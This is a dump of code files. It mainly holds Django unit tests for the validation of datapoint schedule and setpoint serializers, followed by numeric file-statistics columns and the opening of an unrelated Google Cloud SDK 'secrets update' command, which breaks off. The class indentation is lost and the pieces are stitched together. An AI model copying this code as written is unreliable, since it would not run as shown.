            caught_exception = exception
        assert caught_exception is None
def test_value_in_min_max(self):
    """
    Check that for continuous numeric datapoints only those values are
    accepted that reside within the min/max bounds, at least if
    min/max are set.
    """
    dp = self.datapoint
    dp.data_format = "continuous_numeric"
    dp.save()
    valid_combinations = [
        {"min": 1.00, "max": 3.00, "value": 2.00},
        {"min": None, "max": None, "value": 2.00},
        {"min": 1.00, "max": 3.00, "value": None},
        {"min": None, "max": 3.00, "value": 0.00},
        {"min": 1.00, "max": None, "value": 4.00},
    ]
    for valid_combination in valid_combinations:
        dp.min_value = valid_combination["min"]
        dp.max_value = valid_combination["max"]
        dp.save()
        test_data = {
            "schedule": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "value": json.dumps(valid_combination["value"])
                }
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        try:
            is_valid = serializer.is_valid(raise_exception=True)
        except Exception:
            # Log which combination failed; the bare assert below
            # would not tell us.
            logger.exception(
                "test_value_in_min_max failed for valid combination %s",
                str(valid_combination)
            )
            is_valid = False
        assert is_valid
    invalid_combinations = [
        {"min": 1.00, "max": 3.00, "value": 4.00},
        {"min": 1.00, "max": 3.00, "value": 0.00},
        {"min": None, "max": 3.00, "value": 4.00},
        {"min": 1.00, "max": None, "value": 0.00},
    ]
    for invalid_combination in invalid_combinations:
        dp.min_value = invalid_combination["min"]
        dp.max_value = invalid_combination["max"]
        # Persist the changed bounds as in the loop above. This save
        # was missing before, which relied on the serializer reading
        # the unsaved instance attributes.
        dp.save()
        test_data = {
            "schedule": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "value": json.dumps(invalid_combination["value"])
                },
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        if caught_execption is None:
            logger.error(
                "test_value_in_min_max failed for invalid combination %s",
                str(invalid_combination)
            )
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "schedule" in caught_execption.detail
        exception_detail = str(caught_execption.detail["schedule"])
        assert "numeric datapoint" in exception_detail
def test_value_in_allowed_values(self):
    """
    Check that for discrete valued datapoints only those values are
    accepted that are one of the allowed values.
    """
    dp = self.datapoint
    dp.data_format = "continuous_numeric"
    dp.save()
    valid_combinations = [
        {
            "value": 2.0,
            "data_format": "discrete_numeric",
            "allowed_values": [1.0, 2.0, 3.0]
        },
        {
            "value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": [1, 2, 3]
        },
        {
            "value": "OK",
            "data_format": "discrete_text",
            "allowed_values": ["OK", "Done"]
        },
        {
            "value": None,
            "data_format": "discrete_text",
            "allowed_values": [None, "Nope"]
        },
    ]
    for valid_combination in valid_combinations:
        dp.data_format = valid_combination["data_format"]
        dp.allowed_values = valid_combination["allowed_values"]
        dp.save()
        test_data = {
            "schedule": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "value": json.dumps(valid_combination["value"])
                },
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        try:
            is_valid = serializer.is_valid(raise_exception=True)
        except Exception:
            logger.exception(
                "test_value_in_allowed_values failed for valid "
                "combination %s",
                str(valid_combination)
            )
            is_valid = False
        assert is_valid
    invalid_combinations = [
        {
            "value": 2.0,
            "data_format": "discrete_numeric",
            "allowed_values": [1.0, 3.0]
        },
        {
            "value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": [1, 3]
        },
        {
            "value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": []
        },
        {
            "value": "OK",
            "data_format": "discrete_text",
            "allowed_values": ["NotOK", "OK "]
        },
        {
            "value": "",
            "data_format": "discrete_text",
            "allowed_values": ["OK"]
        },
        {
            "value": None,
            "data_format": "discrete_text",
            "allowed_values": ["OK"]
        },
    ]
    for invalid_combination in invalid_combinations:
        dp.data_format = invalid_combination["data_format"]
        dp.allowed_values = invalid_combination["allowed_values"]
        dp.save()
        test_data = {
            "schedule": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    # BUGFIX: this previously serialized the value of
                    # the last *valid* combination, so the intended
                    # invalid values were never actually tested.
                    "value": json.dumps(invalid_combination["value"])
                },
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        if caught_execption is None:
            # logger.error, not logger.exception: no exception is
            # active here. Also log the *invalid* combination, which
            # is the one under test.
            logger.error(
                "test_value_in_allowed_values failed for invalid "
                "combination %s",
                str(invalid_combination)
            )
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "schedule" in caught_execption.detail
        exception_detail = str(caught_execption.detail["schedule"])
        assert "discrete datapoint" in exception_detail
def test_timestamps_are_validated_against_each_other(self):
    """
    Check that if from_timestamp and to_timestamp are both not None,
    it is validated that to_timestamp is the larger one.
    """
    datapoint = self.datapoint
    datapoint.data_format = "generic_text"
    datapoint.save()
    # to_timestamp lies before from_timestamp here.
    schedule_item = {
        "from_timestamp": timestamp_utc_now(),
        "to_timestamp": timestamp_utc_now() - 1000,
        "value": json.dumps("not a number"),
    }
    test_data = {
        "schedule": [schedule_item],
        "timestamp": timestamp_utc_now(),
    }
    serializer = DatapointScheduleSerializer(datapoint, data=test_data)
    caught_exception = None
    try:
        serializer.is_valid(raise_exception=True)
    except Exception as exception:
        caught_exception = exception
    assert caught_exception is not None
    assert caught_exception.status_code == 400
    assert "schedule" in caught_exception.detail
    exception_detail = str(caught_exception.detail["schedule"])
    assert "timestamp must be larger" in exception_detail
def test_timestamps_are_validated_to_be_numbers(self):
    """
    Check that from_timestamp and to_timestamp are validated to be
    None or convertible to a number.

    The two previously duplicated stanzas (bad value in either field)
    are folded into one loop.
    """
    dp = self.datapoint
    dp.data_format = "generic_text"
    dp.save()
    # Place the non numeric string in each timestamp field in turn.
    timestamp_pairs = [
        {"from_timestamp": None, "to_timestamp": "not 1564489613491"},
        {"from_timestamp": "not 1564489613491", "to_timestamp": None},
    ]
    for timestamps in timestamp_pairs:
        schedule_item = dict(timestamps)
        schedule_item["value"] = json.dumps("not a number")
        test_data = {
            "schedule": [schedule_item],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointScheduleSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "schedule" in caught_execption.detail
        exception_detail = str(caught_execption.detail["schedule"])
        assert "integer" in exception_detail
def test_timestamps_not_in_milliseconds_yield_error(self):
    """
    Check that an error message is yielded if a timestamp is obviously
    not in milliseconds.

    The four previously duplicated stanzas are parameterized over the
    suspicious timestamp and the field that carries it.
    """
    dp = self.datapoint
    dp.data_format = "generic_text"
    dp.save()
    # (suspicious timestamp, expected error fragment); dividing by
    # 1000 emulates a timestamp in seconds, multiplying by 1000 one
    # in microseconds.
    cases = [
        (round(timestamp_utc_now() / 1000), "seems unreasonably low"),
        (round(timestamp_utc_now() * 1000), "seems unreasonably high"),
    ]
    for bad_timestamp, expected_fragment in cases:
        # The check must trigger for either of the two item fields.
        for field in ["to_timestamp", "from_timestamp"]:
            schedule_item = {
                "from_timestamp": None,
                "to_timestamp": None,
                "value": json.dumps("not a number"),
            }
            schedule_item[field] = bad_timestamp
            test_data = {
                "schedule": [schedule_item],
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointScheduleSerializer(dp, data=test_data)
            caught_execption = None
            try:
                serializer.is_valid(raise_exception=True)
            except Exception as e:
                caught_execption = e
            assert caught_execption is not None
            assert caught_execption.status_code == 400
            assert "schedule" in caught_execption.detail
            exception_detail = str(caught_execption.detail["schedule"])
            assert expected_fragment in exception_detail
class TestDatapointSetpointSerializer(TransactionTestCase):
@classmethod
def setUpClass(cls):
    """
    Build concrete models and tables for the abstract templates.

    Datapoint model is abstract, hence no table exists. Here we
    create a concrete model as child of datapoint and create a table
    on the fly for testing.
    """
    class Datapoint(DatapointTemplate):
        class Meta:
            app_label="test_message_format_models_7"
    class DatapointSetpoint(DatapointSetpointTemplate):
        class Meta:
            app_label="test_message_format_models_7"
        # The datapoint foreign key must be overwritten as it points
        # to the abstract datapoint model by default.
        datapoint = models.ForeignKey(
            Datapoint,
            on_delete=models.CASCADE,
        )
    cls.Datapoint = Datapoint
    cls.DatapointSetpoint = DatapointSetpoint
    # Create the tables for the ad-hoc models directly; no migrations
    # exist for them.
    with connection.schema_editor() as schema_editor:
        schema_editor.create_model(cls.Datapoint)
        schema_editor.create_model(cls.DatapointSetpoint)
    # Create a dummy datapoint to be used as foreign key for the msgs.
    cls.datapoint = cls.Datapoint(type="sensor")
    cls.datapoint.save()
    # Here are the default field values (used by tests when creating
    # setpoint message objects):
    cls.default_field_values = {"datapoint": cls.datapoint}
@classmethod
def tearDownClass(cls) -> None:
    """
    Finally, drop the tables of the temporary models again.
    """
    with connection.schema_editor() as schema_editor:
        for model in (cls.Datapoint, cls.DatapointSetpoint):
            schema_editor.delete_model(model)
def setUp(self):
    """
    Reset datapoint metadata before each test, to prevent unexpected
    validation errors due to value checking and stuff.
    """
    datapoint = self.datapoint
    datapoint.data_format = "generic_text"
    datapoint.save()
def tearDown(self):
    """
    Remove all setpoint messages, so the next test starts with empty
    tables.
    """
    self.DatapointSetpoint.objects.all().delete()
def test_to_representation(self):
    """
    Check that a setpoint message is serialized as expected.
    """
    setpoint_items = [
        {
            "from_timestamp": None,
            "to_timestamp": timestamp_utc_now() + 1000,
            "preferred_value": json.dumps(21),
            "acceptable_values": [20.5, 21, 21.5],
        },
        {
            "from_timestamp": timestamp_utc_now() + 1000,
            "to_timestamp": None,
            "preferred_value": json.dumps(None),
            "acceptable_values": [None],
        },
    ]
    expected_data = {
        "setpoint": setpoint_items,
        "timestamp": timestamp_utc_now(),
    }
    # Store a setpoint message carrying exactly the expected payload.
    field_values = self.default_field_values.copy()
    field_values["setpoint"] = expected_data["setpoint"]
    field_values["time"] = datetime_from_timestamp(
        expected_data["timestamp"]
    )
    dp_setpoint = self.DatapointSetpoint.objects.create(**field_values)
    serializer = DatapointSetpointSerializer(dp_setpoint)
    assert serializer.data == expected_data
    # NOTE: A serialization check for `"setpoint": None` existed here
    # but is deactivated, as None is currently not defined as a valid
    # setpoint.
def test_required_fields(self):
    """
    Check that setpoint and timestamp fields must be given.
    """
    dp = self.datapoint
    # Empty payload, i.e. both required fields missing.
    test_data = {}
    serializer = DatapointSetpointSerializer(dp, data=test_data)
    caught_execption = None
    try:
        serializer.is_valid(raise_exception=True)
    except Exception as e:
        caught_execption = e
    # Fail explicitly if no exception was raised at all, instead of
    # running into an AttributeError on None below. This matches the
    # sibling tests in this file.
    assert caught_execption is not None
    assert caught_execption.status_code == 400
    assert "setpoint" in caught_execption.detail
    assert "timestamp" in caught_execption.detail
def test_timestamp_validated(self):
    """
    Check that the serializer doesn't accept unreasonably low or high
    timestamp values, nor strings.
    """
    wrong_timestamps = [
        timestamp_utc_now() + 2e11,
        timestamp_utc_now() - 2e11,
        "asdkajsdkajs",
    ]
    for timestamp in wrong_timestamps:
        test_data = {
            "setpoint": None,
            "timestamp": timestamp,
        }
        serializer = DatapointSetpointSerializer(
            self.datapoint, data=test_data
        )
        # BUGFIX: reset for every iteration. Previously the variable
        # leaked between iterations (and was undefined on the first
        # one), so a timestamp that raised no error could still pass
        # the asserts below via the stale exception of an earlier
        # iteration.
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "timestamp" in caught_execption.detail
def test_setpoint_validated_as_correct_json_or_null(self):
    """
    Check that a setpoint consisting of parsable JSON is accepted.
    """
    datapoint = self.datapoint
    # A well formed setpoint message; the preferred_value is valid
    # JSON.
    setpoint_item = {
        "from_timestamp": None,
        "to_timestamp": timestamp_utc_now() + 1000,
        "preferred_value": json.dumps("not a number"),
    }
    test_data = {
        "setpoint": [setpoint_item],
        "timestamp": timestamp_utc_now(),
    }
    serializer = DatapointSetpointSerializer(datapoint, data=test_data)
    assert serializer.is_valid()
    # NOTE: A `"setpoint": None` payload used to be accepted too, but
    # is currently not a valid setpoint anymore; the corresponding
    # (deactivated) check has been removed.
def test_setpoint_validated_as_list(self):
    """
    Check that the setpoint is validated to be a list.
    """
    datapoint = self.datapoint
    # Valid JSON, but a dict instead of a list of setpoint items.
    test_data = {
        "setpoint": {"Nope": 1},
        "timestamp": timestamp_utc_now(),
    }
    serializer = DatapointSetpointSerializer(datapoint, data=test_data)
    caught_exception = None
    try:
        serializer.is_valid(raise_exception=True)
    except Exception as exception:
        caught_exception = exception
    assert caught_exception is not None
    assert caught_exception.status_code == 400
    assert "setpoint" in caught_exception.detail
def test_setpoint_items_validated_as_dict(self):
    """
    Check that the setpoint items are validated to be dicts.
    """
    datapoint = self.datapoint
    # A valid JSON list, but its items are no setpoint item dicts.
    test_data = {
        "setpoint": ["Nope", 1],
        "timestamp": timestamp_utc_now(),
    }
    serializer = DatapointSetpointSerializer(datapoint, data=test_data)
    caught_exception = None
    try:
        serializer.is_valid(raise_exception=True)
    except Exception as exception:
        caught_exception = exception
    assert caught_exception is not None
    assert caught_exception.status_code == 400
    assert "setpoint" in caught_exception.detail
def test_setpoint_items_validated_for_expected_keys(self):
    """
    Check that the setpoint items are validated to contain all of the
    keys expected for the datapoint's data_format.
    """
    dp = self.datapoint
    # Keys every setpoint item must carry.
    always_required_keys = [
        "from_timestamp",
        "to_timestamp",
        "preferred_value"
    ]
    # Keys required only for continuous datapoints.
    only_con_keys = [
        "min_value",
        "max_value"
    ]
    # Keys required only for discrete datapoints.
    only_dis_keys = [
        "acceptable_values"
    ]
    # Here a listing which keys must be given in a setpoint message per
    # data_format.
    required_keys_per_data_format = {
        "generic_numeric": always_required_keys,
        "continuous_numeric": always_required_keys + only_con_keys,
        "discrete_numeric": always_required_keys + only_dis_keys,
        "generic_text": always_required_keys,
        "discrete_text": always_required_keys + only_dis_keys,
    }
    # Here the dummy values for all fields used above.
    setpoint_all_fields = {
        "from_timestamp": None,
        "to_timestamp": timestamp_utc_now() + 1000,
        "preferred_value": json.dumps(21),
        "acceptable_values": [20.5, 21, 21.5],
        "min_value": 20.5,
        "max_value": 21.5,
        "no_valid_key": 1337
    }
    for data_format in required_keys_per_data_format:
        dp.data_format = data_format
        dp.save()
        required_keys = required_keys_per_data_format[data_format]
        # Now construct per data_format test cases to verify that every
        # missing field is found for every data_format.
        for key_left_out in required_keys:
            setpoint = {}
            for key in required_keys:
                if key == key_left_out:
                    continue
                setpoint[key] = setpoint_all_fields[key]
            test_data = {
                "setpoint": [setpoint],
                "timestamp": timestamp_utc_now(),
            }
            serializer = DatapointSetpointSerializer(dp, data=test_data)
            caught_execption = None
            try:
                serializer.is_valid(raise_exception=True)
                # Only reached if validation wrongly succeeded; the
                # asserts below will fail afterwards. BUGFIX: a space
                # was missing at the string concatenation, yielding
                # "validatingsetpoint" in the log output.
                logger.error(
                    "Failed to identify required key (%s) while "
                    "validating setpoint data for data_format (%s)" %
                    (key_left_out, data_format)
                )
            except Exception as e:
                caught_execption = e
            assert caught_execption is not None
            assert caught_execption.status_code == 400
            assert "setpoint" in caught_execption.detail
            exception_detail = str(caught_execption.detail["setpoint"])
            assert key_left_out in exception_detail
    # NOTE: Verifying that additional *unexpected* keys are rejected
    # does not work, as the SetpointItem class will not pick up any
    # unexpected fields; the corresponding checks are deactivated.
def test_numeric_value_of_setpoint_validated(self):
    """
    Check that for numeric data_formats, only numeric preferred_values
    are accepted within setpoints.
    """
    dp = self.datapoint
    # Presumably set so that discrete formats don't fail for the wrong
    # reason (value not in allowed_values) — TODO confirm.
    dp.allowed_values = '["not a number"]'
    dp.save()
    # Here a listing which keys must be given in a setpoint message per
    # data_format.
    always_required_keys = [
        "from_timestamp",
        "to_timestamp",
        "preferred_value"
    ]
    # Keys required only for continuous datapoints.
    only_con_keys = [
        "min_value",
        "max_value"
    ]
    # Keys required only for discrete datapoints.
    only_dis_keys = [
        "acceptable_values"
    ]
    required_keys_per_data_format = {
        "generic_numeric": always_required_keys,
        "continuous_numeric": always_required_keys + only_con_keys,
        "discrete_numeric": always_required_keys + only_dis_keys,
        "generic_text": always_required_keys,
        "discrete_text": always_required_keys + only_dis_keys,
    }
    # Here the dummy values for all fields used above.
    setpoint_all_fields = {
        "from_timestamp": None,
        "to_timestamp": timestamp_utc_now() + 1000,
        "preferred_value": json.dumps("not a number"),
        "acceptable_values": ["not a number"],
        "min_value": 20.5,
        "max_value": 21.5,
    }
    numeric_data_formats = [
        "generic_numeric",
        "continuous_numeric",
        "discrete_numeric",
    ]
    for data_format in numeric_data_formats:
        dp.data_format = data_format
        dp.save()
        required_keys = required_keys_per_data_format[data_format]
        # Build a setpoint item with exactly the required keys.
        setpoint = {}
        for key in required_keys:
            setpoint[key] = setpoint_all_fields[key]
        test_data = {
            "setpoint": [setpoint],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
            # Only reached if validation wrongly succeeded; the
            # asserts below fail in that case.
            logger.error(
                "Failed to identify non numeric value while "
                "validating setpoint data for data_format (%s)" %
                data_format
            )
        except Exception as e:
            caught_execption = e
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "setpoint" in caught_execption.detail
        exception_detail = str(caught_execption.detail["setpoint"])
        assert "cannot be parsed to float" in exception_detail
    # Also verify the opposite, that text values are not rejected.
    text_data_formats = [
        "generic_text",
        "discrete_text",
    ]
    for data_format in text_data_formats:
        dp.data_format = data_format
        dp.save()
        required_keys = required_keys_per_data_format[data_format]
        setpoint = {}
        for key in required_keys:
            setpoint[key] = setpoint_all_fields[key]
        test_data = {
            "setpoint": [setpoint],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_execption = None
        try:
            assert serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
            # Log the full traceback to ease debugging before the
            # assert below fails.
            logger.exception("")
        assert caught_execption is None
def test_preferred_value_in_min_max(self):
    """
    Check that for continuous numeric datapoints only those
    preferred_values are accepted that reside within the min/max
    bounds, at least if min/max are set.
    """
    dp = self.datapoint
    dp.data_format = "continuous_numeric"
    dp.save()
    valid_combinations = [
        {"min": 1.00, "max": 3.00, "preferred_value": 2.00},
        {"min": None, "max": None, "preferred_value": 2.00},
        {"min": 1.00, "max": 3.00, "preferred_value": None},
        {"min": None, "max": 3.00, "preferred_value": 0.00},
        {"min": 1.00, "max": None, "preferred_value": 4.00},
    ]
    for valid_combination in valid_combinations:
        dp.min_value = valid_combination["min"]
        dp.max_value = valid_combination["max"]
        dp.save()
        test_data = {
            "setpoint": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "preferred_value":
                        json.dumps(valid_combination["preferred_value"]),
                    "min_value": None,
                    "max_value": None
                }
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        try:
            is_valid = serializer.is_valid(raise_exception=True)
        except Exception:
            # Log which combination failed; the bare assert below
            # would not tell us.
            logger.exception(
                "test_value_in_min_max failed for valid combination %s",
                str(valid_combination)
            )
            is_valid = False
        assert is_valid
    invalid_combinations = [
        {"min": 1.00, "max": 3.00, "preferred_value": 4.00},
        {"min": 1.00, "max": 3.00, "preferred_value": 0.00},
        {"min": None, "max": 3.00, "preferred_value": 4.00},
        {"min": 1.00, "max": None, "preferred_value": 0.00},
    ]
    for invalid_combination in invalid_combinations:
        dp.min_value = invalid_combination["min"]
        dp.max_value = invalid_combination["max"]
        # Persist the changed bounds as in the loop above. This save
        # was missing before, which relied on the serializer reading
        # the unsaved instance attributes.
        dp.save()
        test_data = {
            "setpoint": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "preferred_value":
                        json.dumps(invalid_combination["preferred_value"]),
                    "min_value": None,
                    "max_value": None
                },
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        if caught_execption is None:
            logger.error(
                "test_value_in_min_max failed for invalid combination %s",
                str(invalid_combination)
            )
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "setpoint" in caught_execption.detail
        exception_detail = str(caught_execption.detail["setpoint"])
        assert "numeric datapoint" in exception_detail
def test_preferred_value_in_allowed_values(self):
    """
    Check that for discrete valued datapoints only those
    preferred_values are accepted that are one of the allowed values.
    """
    dp = self.datapoint
    valid_combinations = [
        {
            "preferred_value": 2.0,
            "data_format": "discrete_numeric",
            "allowed_values": [1.0, 2.0, 3.0]
        },
        {
            "preferred_value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": [1, 2, 3]
        },
        {
            "preferred_value": "OK",
            "data_format": "discrete_text",
            "allowed_values": ["OK", "Done"]
        },
        {
            "preferred_value": None,
            "data_format": "discrete_text",
            "allowed_values": [None, "Nope"]
        },
    ]
    for valid_combination in valid_combinations:
        dp.data_format = valid_combination["data_format"]
        dp.allowed_values = valid_combination["allowed_values"]
        dp.save()
        test_data = {
            "setpoint": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "preferred_value":
                        json.dumps(valid_combination["preferred_value"]),
                    "acceptable_values":
                        [valid_combination["preferred_value"]]
                }
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        try:
            is_valid = serializer.is_valid(raise_exception=True)
        except Exception:
            logger.exception(
                "test_preferred_value_in_allowed_values failed for valid "
                "combination %s",
                str(valid_combination)
            )
            is_valid = False
        assert is_valid
    invalid_combinations = [
        {
            "preferred_value": 2.0,
            "data_format": "discrete_numeric",
            "allowed_values": [1.0, 3.0]
        },
        {
            "preferred_value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": [1, 3]
        },
        {
            "preferred_value": 2,
            "data_format": "discrete_numeric",
            "allowed_values": []
        },
        {
            "preferred_value": "OK",
            "data_format": "discrete_text",
            "allowed_values": ["NotOK", "OK "]
        },
        {
            "preferred_value": "",
            "data_format": "discrete_text",
            "allowed_values": ["OK"]
        },
        {
            "preferred_value": None,
            "data_format": "discrete_text",
            "allowed_values": ["OK"]
        },
    ]
    for invalid_combination in invalid_combinations:
        dp.data_format = invalid_combination["data_format"]
        dp.allowed_values = invalid_combination["allowed_values"]
        dp.save()
        test_data = {
            "setpoint": [
                {
                    "from_timestamp": None,
                    "to_timestamp": timestamp_utc_now() + 1000,
                    "preferred_value":
                        json.dumps(invalid_combination["preferred_value"]),
                    "acceptable_values":
                        [invalid_combination["preferred_value"]]
                }
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_execption = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as e:
            caught_execption = e
        if caught_execption is None:
            # BUGFIX: logger.error instead of logger.exception (no
            # exception is active here), log the *invalid* combination
            # and use the correct test name in the message.
            logger.error(
                "test_preferred_value_in_allowed_values failed for "
                "invalid combination %s",
                str(invalid_combination)
            )
        assert caught_execption is not None
        assert caught_execption.status_code == 400
        assert "setpoint" in caught_execption.detail
        exception_detail = str(caught_execption.detail["setpoint"])
        assert "preferred_value" in exception_detail
def test_timestamps_are_validated_against_each_other(self):
    """
    Check that if from_timestamp and to_timestamp are both not None,
    it is validated that to_timestamp is the larger one.
    """
    datapoint = self.datapoint
    datapoint.save()
    # to_timestamp lies before from_timestamp here.
    setpoint_item = {
        "from_timestamp": timestamp_utc_now(),
        "to_timestamp": timestamp_utc_now() - 1000,
        "preferred_value": json.dumps("not a number"),
    }
    test_data = {
        "setpoint": [setpoint_item],
        "timestamp": timestamp_utc_now(),
    }
    serializer = DatapointSetpointSerializer(datapoint, data=test_data)
    caught_exception = None
    try:
        serializer.is_valid(raise_exception=True)
    except Exception as exception:
        caught_exception = exception
    assert caught_exception is not None
    assert caught_exception.status_code == 400
    assert "setpoint" in caught_exception.detail
    exception_detail = str(caught_exception.detail["setpoint"])
    assert "timestamp must be larger" in exception_detail
def test_timestamps_are_validated_to_be_numbers(self):
    """
    Check that if from_timestamp and to_timestamp are validated to be
    None or convertable to a number.
    """
    dp = self.datapoint
    dp.save()
    # One non-numeric timestamp per round, on each side of the interval.
    invalid_setpoints = [
        {
            "from_timestamp": None,
            "to_timestamp": "not 1564489613491",
            "preferred_value": json.dumps("not a number"),
        },
        {
            "from_timestamp": "not 1564489613491",
            "to_timestamp": None,
            "preferred_value": "not a number",
        },
    ]
    for invalid_setpoint in invalid_setpoints:
        test_data = {
            "setpoint": [invalid_setpoint],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_exception = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as err:
            caught_exception = err
        assert caught_exception is not None
        assert caught_exception.status_code == 400
        assert "setpoint" in caught_exception.detail
        detail_text = str(caught_exception.detail["setpoint"])
        assert "integer" in detail_text
def test_timestamps_not_in_milliseconds_yield_error(self):
    """
    Check that an error message is yielded if the timestamp is in
    obviously not in milliseconds.
    """
    dp = self.datapoint
    dp.save()
    # (from_timestamp, to_timestamp, expected error fragment) — seconds
    # scale should be flagged as too low, microseconds scale as too high.
    cases = [
        (None, round(timestamp_utc_now() / 1000), "seems unreasonably low"),
        (round(timestamp_utc_now() / 1000), None, "seems unreasonably low"),
        (None, round(timestamp_utc_now() * 1000), "seems unreasonably high"),
        (round(timestamp_utc_now() * 1000), None, "seems unreasonably high"),
    ]
    for from_ts, to_ts, expected_fragment in cases:
        test_data = {
            "setpoint": [
                {
                    "from_timestamp": from_ts,
                    "to_timestamp": to_ts,
                    "preferred_value": json.dumps("not a number"),
                }
            ],
            "timestamp": timestamp_utc_now(),
        }
        serializer = DatapointSetpointSerializer(dp, data=test_data)
        caught_exception = None
        try:
            serializer.is_valid(raise_exception=True)
        except Exception as err:
            caught_exception = err
        assert caught_exception is not None
        assert caught_exception.status_code == 400
        assert "setpoint" in caught_exception.detail
        detail_text = str(caught_exception.detail["setpoint"])
        assert expected_fragment in detail_text
| 35.834879
| 80
| 0.545625
| 7,432
| 77,260
| 5.423708
| 0.043326
| 0.088938
| 0.035724
| 0.048823
| 0.928403
| 0.915999
| 0.909251
| 0.888834
| 0.874668
| 0.858344
| 0
| 0.013164
| 0.371732
| 77,260
| 2,155
| 81
| 35.851508
| 0.817264
| 0.133122
| 0
| 0.771357
| 0
| 0
| 0.118971
| 0.007186
| 0
| 0
| 0
| 0
| 0.104271
| 1
| 0.028266
| false
| 0
| 0.007538
| 0
| 0.045226
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac50cde3638ea63bce65d7c65972c507072d12a1
| 11,404
|
py
|
Python
|
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/surface/secrets/update.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update an existing secret."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.secrets import api as secrets_api
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.secrets import args as secrets_args
from googlecloudsdk.command_lib.secrets import log as secrets_log
from googlecloudsdk.command_lib.secrets import util as secrets_util
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core.console import console_io
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
    r"""Update a secret's metadata.

    Update a secret's metadata (e.g. labels). This command will
    return an error if given a secret that does not exist.

    ## EXAMPLES

    Update the label of a secret named 'my-secret'.

      $ {command} my-secret --update-labels=foo=bar

    Update the label of a secret using an etag.

      $ {command} my-secret --update-labels=foo=bar --etag=\"123\"

    Update a secret to have a next-rotation-time:

      $ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"

    Update a secret to have a next-rotation-time and rotation-period:

